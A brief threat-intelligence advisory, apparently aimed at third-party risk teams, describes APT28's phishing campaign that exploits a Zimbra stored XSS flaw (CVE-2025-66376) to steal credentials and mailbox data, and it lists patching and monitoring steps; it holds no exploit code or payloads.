APT28 Exploits Zimbra XSS (CVE‑2025‑66376) in Phishing Campaign Targeting Ukrainian Government
What Happened — APT28 (Fancy Bear) leveraged a stored cross‑site scripting flaw (CVE‑2025‑66376) in the Zimbra Collaboration Suite to deliver a malicious HTML‑only phishing email. When opened in a vulnerable Zimbra webmail session, the payload executed remote code, harvested credentials, session tokens, 2FA backup codes, and mailbox contents, exfiltrating data via DNS and HTTPS.
Why It Matters for TPRM —
- Unpatched Zimbra servers expose third‑party data and credentials, creating a supply‑chain risk for any organization that relies on the platform.
- Credential harvesting can lead to lateral movement into other vendor environments, amplifying breach impact.
- The attack demonstrates that “attachment‑free” phishing can bypass many traditional email defenses.
Who Is Affected — Government agencies, critical infrastructure entities, and any enterprise using Zimbra Collaboration Suite (on‑prem or hosted).
Recommended Actions —
- Verify all Zimbra deployments are patched to the November 2025 release or later.
- Enforce MFA and monitor for anomalous mailbox activity.
- Conduct a rapid inventory of third‑party email services and assess their patch management processes.
- Update email security rules to detect HTML‑only phishing payloads and block suspicious scripts.
Technical Notes — CVE‑2025‑66376 is a stored XSS that enables unauthenticated remote code execution. The exploit chain lives entirely within the email body; no attachments or links are present. Harvested data includes credentials, session tokens, backup 2FA codes, and up to 90 days of mailbox content, exfiltrated over DNS and HTTPS. Source: BleepingComputer